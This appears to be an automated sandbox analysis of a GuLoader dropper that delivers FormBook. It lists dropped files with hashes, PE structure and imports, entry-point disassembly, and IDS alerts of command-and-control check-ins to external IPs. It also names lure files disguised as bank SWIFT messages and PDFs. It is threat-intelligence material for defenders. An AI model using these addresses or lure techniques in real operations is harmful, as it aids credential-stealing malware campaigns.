                                                                                                                                      ekstre.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                        Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                          ekstre.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                            Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousGuLoaderBrowse

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\Users\user\AppData\Local\Anvilled\Disintrench223.Lrl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):369765
                                                                                                                                              Entropy (8bit):7.629530970128673
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:0wrXUVnR5dk609ys1b9uKjiYREmJc3SAJDmsfPLpnMADa:R+R5dzWt1biogJD9P9PDa
                                                                                                                                              MD5:A71E9D6209889F11905FA3C40B25B42E
                                                                                                                                              SHA1:91F72EAA951AA2624BE666B602F638B57A7B33D4
                                                                                                                                              SHA-256:546EE04EBF7F2C7B904DDFEB054D8EC27963AF1CBB9CD28503B58ED55206408F
                                                                                                                                              SHA-512:3A7EEAE9B391BBC7F4A4B8B89C46120F5A8FD07A7C58A86A01D0675F0DF9E3AC485896B3232846FFDDB509F1CF1BE04485EC6D01C53F98B1852BC4BB7CB7FB3F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:....11.....................D......................................H...Y.............l..!!.........B..*.'''.UU.CC................................................................MM...**.....j...222..............................]]....[[[[[[..R...hh....#.ii.....f.....8...XkxO...IU.F]..;~.....t..........-.=.>vW._.....K....cJ...*..z}u.De..^Z.x.\.ff........H.b.j..LM..:.&.6...d.. ..".H....@.W.5..S{G.....r.+.g...(.O.....2..jo..v....B.Z.N..w.......q.Vs`...[b...9..E..T..../...|....'.y.Q..i..P..-.........91..#....l.%.aR....m..C.o.....3...Amph...8...XkxO...IU.F........*..;~.....t.n.=.>vW._.....K....cJ...*..z..qX........0u.De..^Z.x.\.f..b.j..LM..:.&.6...d.. ..".H. ........7..@.W.5..S{G.....r.+.g...(.O.....2..Z.N..w...............q.Vs`...[b...9..E..T..../.. I.....f.s...D..|....'.y.Q..i..P..-.1..#....l.%.aR....m..C.o.....3...Amph...8..f....f.q.P..XkxO...IU.F]..;~.....t.n.......$.>vW._.....K....cJ...*..z}u.De..^..QL...c....*.x.\.f..b.j..LM..:.&.6...d.. .

                                                                                                                                              C:\Users\user\AppData\Local\Anvilled\Opsamlingsbeholdere119.bes

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):415743
                                                                                                                                              Entropy (8bit):1.2524422116890421
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:r1/VRVN7GaY97mbexftA4Z+RRCLDHuPxfARLhzR+9wBhtOxALX5Wa/5X6dJddvt2:LMxA4/Lf6dHgeGxN37ruZwuLi+OLj
                                                                                                                                              MD5:A6B0286190FF25673A5BBCCA3E635E17
                                                                                                                                              SHA1:B50D863E08054654434EEEAD618AE36D66F5AD59
                                                                                                                                              SHA-256:2587546927274A33BE48C542AD1B98E07DF0C2A8503AFBC1F260EBEC1CB13EDE
                                                                                                                                              SHA-512:1F9C0F6CD3BE6F79168BBD9B07931181CAE135D144DA4E569191E42BF66C5AF0BE49C894E1608A4C45C3BE38DFD47EB912CBA4DADB660A688474B1A3F2ACC72E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.........................................................................................................................................F....................i..........C...................................................X.............................................................._.................0...........(...............................S...............................?.............(................Z..............................."....................................................B...................;...........................................................................................................(..e...........A.........................................@............................f...............................................h.F............Q......................................................................W...............r..................D..D......4............................................................................U..........J....................._..

                                                                                                                                              C:\Users\user\AppData\Local\Anvilled\Viagram.Chi

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):150717
                                                                                                                                              Entropy (8bit):4.6075331250893115
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:vdv//aYeUak0vzEsZibc/ZZ+LLRf2B5s+/yb1fEyHLkyC/DON2DnxX0m:Jhak0rYbgZZQf2g+/k8EYyC/K4DKm
                                                                                                                                              MD5:22303FBB1D25C1B276AE5F8E751FF4B2
                                                                                                                                              SHA1:ABFA7710A6F1956C7FB30DB43CCAD36A7E6D8235
                                                                                                                                              SHA-256:A310FD8300FBD0C22C5D74651FD028DED78518553F90E4AD69731A5CDF51AEC8
                                                                                                                                              SHA-512:12043F6859AADA73C9468A3287437881A765DC6790E7FA496A2FE51679EC636B051C2F366797BFD5C1D06D87686E03F81FDA1F5772B4CFCC240B864F48C41EF7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:...xx......./...............ddddd.......4..``............nn...g.f........XX.vv.OO...........z...44..........A...................ll..H.==.........u..............i........8.................A........??..........---........KK......#......PP...........................[......XXX.<.........]........6.B..................2222...........""..............#.....oo................--..........bb..........II...n......@@.._.......QQ...R......hhhh.......E................'...............................----......FF....))...................................'.....w.b.vv............qq...............<<...3......ttt.....Z.KK.]..!.7777................................f.UUUU.........YYY........./.kk...sss...g.....n.......;;;........MM....x.aaa.......u.....VV.7777..........uu...uu.........0.wwww...ee.....................6....XX..<<.........|...@..].Y...............................ff..........DDDD..........q..............uuu...G.............\.......mmm............888888..f........................c...........++..&..

                                                                                                                                              C:\Users\user\AppData\Local\Anvilled\ammunitionsfabrikken.txt

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):624
                                                                                                                                              Entropy (8bit):4.25510206166015
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:jXkvaDziGwRUF27KIqXVskejAECJX7lIHLGsvxAtbH1PIwp5Ayq1Bglj4UriJxMJ:jErRUWOjEM7lYLj5AtbB1Bq1U8hJxMJ
                                                                                                                                              MD5:87F4B14CCA6F39D1C934F93B13234749
                                                                                                                                              SHA1:9FCDD0EAD74EE185F49409E0FFE86B1925CC6F77
                                                                                                                                              SHA-256:E619E25D31210DED72B4DBAE631948D4335AEAE318148E864421457EF0F4ACE9
                                                                                                                                              SHA-512:13DB40313FEF1FDEB1D517E0664B7766328DD7DC7244741FF6B6EAE62C6D0BA5EE458E058375C466C9CB6062E0D7DCC3EC3F57310604A7372F79839ACAFE9471
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:dambrttets talentlseres hytteholds indtgtstabets udsondringernes wimp panickiness.perknite equibiradiate silverleaves abolitionising apotheosise serphidae eksempellses rochester fllesfagslreren..forvindet diligence staring anklagerne facades udgrftning klausulelimineringens.synchytrium listiges solsortredens sitarists encyclopedize femogfyrre sphagnummen pervertible pantomorphic polyprotic restress unwesternised udbudsmaterialets..canepin flipperen biogas trenchcoaters populreres abnormalise gult boks fejlsgningernes skakbrikken petromyzon knirkeriers rubiate..digteren adephagia laantagerens mariposite trop octylene,

                                                                                                                                              C:\Users\user\AppData\Local\Anvilled\teleph.all

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):315351
                                                                                                                                              Entropy (8bit):1.2455738850105664
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:kFtpdTjsz/zhmhiCGrJI7rqVQuEB7QCGqvL2f0SQ1E2IC67MpqrchPadg+nlwAGP:mPGDDdQxvn1Xmrizhj8H3hE3MA
                                                                                                                                              MD5:6957AC2FFFF57F658F70A8608C653D42
                                                                                                                                              SHA1:A6764FE4F4FCDD48C73CB23CCCA9CE19E2845935
                                                                                                                                              SHA-256:480D36CF0DE68BEAE5F1ED80A81AEE327BBA323C7B01A478E5D41BF429041F02
                                                                                                                                              SHA-512:0B2575BDBB7DE38A6D5C2D1D5C8641EC7A65F9F05E2DA8CFAD8F09CE47C31EEEA70C891A8A42A4842F27215DEDDB69357DE9293D57C5ECFB19CC6007B1042505
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.................^......... ..............`............3].......................................................C......................................................................o......i..............................B.......c.F....=T..'..........................................U.....m..............*...................K............?................................................................{...............................................j...L.....................................................2x...........................?a.............G.............<.............................................................................".......:............................1......$......+......................R.......................................[.................i............S..../...........................A............................................n................................@....?..................].......2.............................a....................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\nsm5F09.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:zlib compressed data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1272828
                                                                                                                                              Entropy (8bit):4.043377195826715
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:Ay/JwrXUVnR5dk609ys1b9uKjiYREmJc3SAJDmsfPLpnMAD7dsXRvK5ZZQuP/koU:i+R5dzWt1biogJD9P9PDKXRv6ZZrbA
                                                                                                                                              MD5:3E1814A5C91824EB4B702D229FF08714
                                                                                                                                              SHA1:D08A72230046914250E0AE12BFFB14B2A2C5EFC9
                                                                                                                                              SHA-256:9D734B1AD91079288EA265D0B6C348D6013147E195D959C0024F2E1EBBD917C5
                                                                                                                                              SHA-512:E9302D9DD84A0F442277D715290D828BDA1871BFFB5834FACE708BE188E2662CE58E0726CDC86ADB2496BACDA31E183BDAF948E94091B0E47DFF13A249C0137D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:x ......,...................o...................x ............................................................/.............................................................................................................................................................................G...J...............j...........................................................................................................................................E...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12288
                                                                                                                                              Entropy (8bit):5.9764977667479
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CVA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:CrR7SrtTv53tdtTgwF4SQbGPX36wJMw
                                                                                                                                              MD5:D968CB2B98B83C03A9F02DD9B8DF97DC
                                                                                                                                              SHA1:D784C9B7A92DCE58A5038BEB62A48FF509E166A0
                                                                                                                                              SHA-256:A4EC98011EF99E595912718C1A1BF1AA67BFC2192575729D42F559D01F67B95C
                                                                                                                                              SHA-512:2EE41DC68F329A1519A8073ECE7D746C9F3BF45D8EF3B915DEB376AF37E26074134AF5F83C8AF0FE0AB227F0D1ACCA9F37E5CA7AE37C46C3BCC0331FE5E2B97E
                                                                                                                                              Malicious:false
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                              Joe Sandbox View:
                                                                                                                                              • Filename: TERMENII CONTRACTULUI (ACORD NOU#U0102 COMAND#U0102)-pdf.bat.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: f5#U06f6.vbs, Detection: malicious, Browse
                                                                                                                                              • Filename: f5#U06f6.vbs, Detection: malicious, Browse
                                                                                                                                              • Filename: Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs, Detection: malicious, Browse
                                                                                                                                              • Filename: Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs, Detection: malicious, Browse
                                                                                                                                              • Filename: ekstre.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: Ziraat Bankasi Swift Mesaji.pdf.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: ekstre.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: Ziraat Bankasi Swift Mesaji.pdf.exe, Detection: malicious, Browse
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7@t.s!..s!..s!..!T..t!..8Y..t!..s!..g!...T..w!...T..r!...T..r!...T..r!..Richs!..........................PE..L....c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                              Entropy (8bit):7.071641371882409
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                              File name:-pdf.bat.exe
                                                                                                                                              File size:920'486 bytes
                                                                                                                                              MD5:2a19eac38990809a62213e2b89be0f60
                                                                                                                                              SHA1:99d231bc3c54c0d29469c97c4987329fd523fe20
                                                                                                                                              SHA256:d322df678d8d8b40b30c463a51395a961b0a703a01523d6def82a4679b5729a6
                                                                                                                                              SHA512:c5691f86d12f6263405d44288f0ca918dccb8ecd131010053cb12b4989587257935fd0f219ae06f36f79a30fba123596569cdcd0c65a342db2d68583f6a56d11
                                                                                                                                              SSDEEP:24576:ZFZsHTO9u9XKhrmooaiw6J/xJ3hLGdftX8P2J8:Z3n9i6BiwW5J3lStMPm8
                                                                                                                                              TLSH:1715BE0BACD0C9EDCA2CB5F2C837C8741D255D6A98B04B5E6974BA807076B97DD0F82D
                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.;!wuUrwuUrwuUr<.QsuuUr<.SsvuUr<.TsxuUrwuTr.uUr..Qs|uUr...rvuUr..WsvuUrRichwuUr........................PE..L...*..c...........

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:070911614d3d3117

                                                                                                                                              Static PE Info

                                                                                                                                              General

                                                                                                                                              Entrypoint:0x403804
                                                                                                                                              Entrypoint Section:.text
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                              Time Stamp:0x63A18D2A [Tue Dec 20 10:23:38 2022 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:5
                                                                                                                                              OS Version Minor:1
                                                                                                                                              File Version Major:5
                                                                                                                                              File Version Minor:1
                                                                                                                                              Subsystem Version Major:5
                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                              Import Hash:84062c623770f0d888e4ca58451aa7ad

                                                                                                                                              Entrypoint Preview

                                                                                                                                              Instruction
                                                                                                                                              sub esp, 000003F0h
                                                                                                                                              push ebx
                                                                                                                                              push ebp
                                                                                                                                              push esi
                                                                                                                                              push edi
                                                                                                                                              xor ebx, ebx
                                                                                                                                              mov edi, 004084F8h
                                                                                                                                              push 00008001h
                                                                                                                                              mov ebp, ebx
                                                                                                                                              mov dword ptr [esp+14h], ebx
                                                                                                                                              call dword ptr [004080B8h]
                                                                                                                                              mov esi, dword ptr [004080A8h]
                                                                                                                                              lea eax, dword ptr [esp+30h]
                                                                                                                                              xorps xmm0, xmm0
                                                                                                                                              mov dword ptr [esp+44h], ebx
                                                                                                                                              push eax
                                                                                                                                              movlpd qword ptr [esp+00000148h], xmm0
                                                                                                                                              mov dword ptr [esp+34h], 0000011Ch
                                                                                                                                              call esi
                                                                                                                                              test eax, eax
                                                                                                                                              jne 00007F3718B637F9h
                                                                                                                                              lea eax, dword ptr [esp+30h]
                                                                                                                                              mov dword ptr [esp+30h], 00000114h
                                                                                                                                              push eax
                                                                                                                                              call esi
                                                                                                                                              push 00000053h
                                                                                                                                              pop eax
                                                                                                                                              mov dl, 04h
                                                                                                                                              mov byte ptr [esp+0000014Ah], dl
                                                                                                                                              cmp word ptr [esp+44h], ax
                                                                                                                                              jne 00007F3718B637D3h
                                                                                                                                              mov eax, dword ptr [esp+5Eh]
                                                                                                                                              add eax, FFFFFFD0h
                                                                                                                                              mov word ptr [esp+00000144h], ax
                                                                                                                                              jmp 00007F3718B637CDh
                                                                                                                                              xor eax, eax
                                                                                                                                              jmp 00007F3718B637B4h
                                                                                                                                              mov dl, byte ptr [esp+0000014Ah]
                                                                                                                                              cmp dword ptr [esp+34h], 0Ah
                                                                                                                                              jnc 00007F3718B637CDh
                                                                                                                                              movzx eax, word ptr [esp+3Ch]
                                                                                                                                              mov dword ptr [esp+3Ch], eax
                                                                                                                                              jmp 00007F3718B637C6h
                                                                                                                                              mov eax, dword ptr [esp+3Ch]
                                                                                                                                              mov dword ptr [00429E38h], eax
                                                                                                                                              movzx eax, byte ptr [esp+34h]
                                                                                                                                              shl ax, 0008h
                                                                                                                                              movzx ecx, ax
                                                                                                                                              movzx eax, byte ptr [esp+38h]
                                                                                                                                              or ecx, eax
                                                                                                                                              movzx eax, byte ptr [esp+00000144h]
                                                                                                                                              shl ax, 0008h
                                                                                                                                              shl ecx, 10h
                                                                                                                                              movzx eax, word ptr [eax]

                                                                                                                                              Data Directories

                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8a200xa0.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e0000x5b2b0.rsrc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                              Sections

                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              .text0x10000x6dab0x6e001138756712947cfad0fec340a9f6322aFalse0.6540127840909091data6.396661733193989IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                              .rdata0x80000x18940x1a00f104cfd27821b85fded983903a163042False0.4299879807692308data4.867236374474069IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .data0xa0000x1fe400x2009a0317be14b12529a14c33f8334a2225False0.2265625data1.7566060613591612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .ndata0x2a0000x240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .rsrc0x4e0000x5b2b00x5b40043b3182ad5c6e9878a85fabd0388831eFalse0.3067208904109589data4.845999503948363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                              Resources

                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                              RT_ICON0x4e2f80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.28078305766784034
                                                                                                                                              RT_ICON0x903200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3406926534958003
                                                                                                                                              RT_ICON0xa0b480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.42973547472838924
                                                                                                                                              RT_ICON0xa4d700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.46763485477178424
                                                                                                                                              RT_ICON0xa73180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5314258911819888
                                                                                                                                              RT_ICON0xa83c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.650709219858156
                                                                                                                                              RT_DIALOG0xa88280x100dataEnglishUnited States0.5234375
                                                                                                                                              RT_DIALOG0xa89280x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                              RT_DIALOG0xa8a480xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                              RT_DIALOG0xa8b100x60dataEnglishUnited States0.7291666666666666
                                                                                                                                              RT_GROUP_ICON0xa8b700x5adataEnglishUnited States0.7555555555555555
                                                                                                                                              RT_VERSION0xa8bd00x2b0dataEnglishUnited States0.4883720930232558
                                                                                                                                              RT_MANIFEST0xa8e800x42eXML 1.0 document, ASCII text, with very long lines (1070), with no line terminatorsEnglishUnited States0.5149532710280373

                                                                                                                                              Imports

                                                                                                                                              DLLImport
                                                                                                                                              ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                                                                                                                              SHELL32.dllSHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteExW
                                                                                                                                              ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                                                                                                                              COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                                                                              USER32.dllPeekMessageW, DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, SetDlgItemTextW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, GetDlgItemTextW, CharNextA, CharPrevW, RegisterClassW, MessageBoxIndirectW, LoadCursorW
                                                                                                                                              GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
                                                                                                                                              KERNEL32.dllGetLastError, WaitForSingleObject, GetExitCodeProcess, RemoveDirectoryW, GetTempFileNameW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, SetErrorMode, CreateProcessW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, CreateFileW, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, WriteFile, MoveFileExW, GetSystemDirectoryW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, GetTempPathW

                                                                                                                                              Possible Origin

                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                              EnglishUnited States

                                                                                                                                              Network Behavior

                                                                                                                                              Suricata IDS Alerts

                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                              2024-10-04T08:05:31.316838+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974084.32.84.3280TCP
                                                                                                                                              2024-10-04T08:05:31.316838+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980084.32.84.3280TCP
                                                                                                                                              2024-10-04T08:05:31.316838+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980284.32.84.3280TCP
                                                                                                                                              2024-10-04T08:05:31.316838+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980184.32.84.3280TCP
                                                                                                                                              2024-10-04T08:05:31.316838+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974284.32.84.3280TCP
                                                                                                                                              2024-10-04T08:05:31.316838+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979013.248.169.4880TCP
                                                                                                                                              2024-10-04T08:05:31.316838+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974184.32.84.3280TCP
                                                                                                                                              2024-10-04T08:06:04.714237+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049727185.86.211.13680TCP
                                                                                                                                              2024-10-04T08:07:04.025801+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204973113.248.169.4880TCP
                                                                                                                                              2024-10-04T08:07:04.025801+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204973113.248.169.4880TCP
                                                                                                                                              2024-10-04T08:07:20.383566+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497323.33.130.19080TCP
                                                                                                                                              2024-10-04T08:07:22.100362+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497333.33.130.19080TCP
                                                                                                                                              2024-10-04T08:07:24.735595+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497343.33.130.19080TCP
                                                                                                                                              2024-10-04T08:07:27.377023+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497353.33.130.19080TCP
                                                                                                                                              2024-10-04T08:07:27.377023+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497353.33.130.19080TCP
                                                                                                                                              2024-10-04T08:07:32.714938+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497363.33.130.19080TCP
                                                                                                                                              2024-10-04T08:07:36.756611+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497373.33.130.19080TCP
                                                                                                                                              2024-10-04T08:07:38.893739+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497383.33.130.19080TCP
                                                                                                                                              2024-10-04T08:07:40.630217+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497393.33.130.19080TCP
                                                                                                                                              2024-10-04T08:07:40.630217+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497393.33.130.19080TCP
                                                                                                                                              2024-10-04T08:07:53.960838+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204974384.32.84.3280TCP
                                                                                                                                              2024-10-04T08:07:53.960838+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204974384.32.84.3280TCP
                                                                                                                                              2024-10-04T08:07:59.544844+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974454.67.87.11080TCP
                                                                                                                                              2024-10-04T08:08:02.225108+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974554.67.87.11080TCP
                                                                                                                                              2024-10-04T08:08:04.912589+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974654.67.87.11080TCP
                                                                                                                                              2024-10-04T08:08:07.604179+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204974754.67.87.11080TCP
                                                                                                                                              2024-10-04T08:08:07.604179+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204974754.67.87.11080TCP
                                                                                                                                              2024-10-04T08:08:13.451544+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049748194.58.112.17480TCP
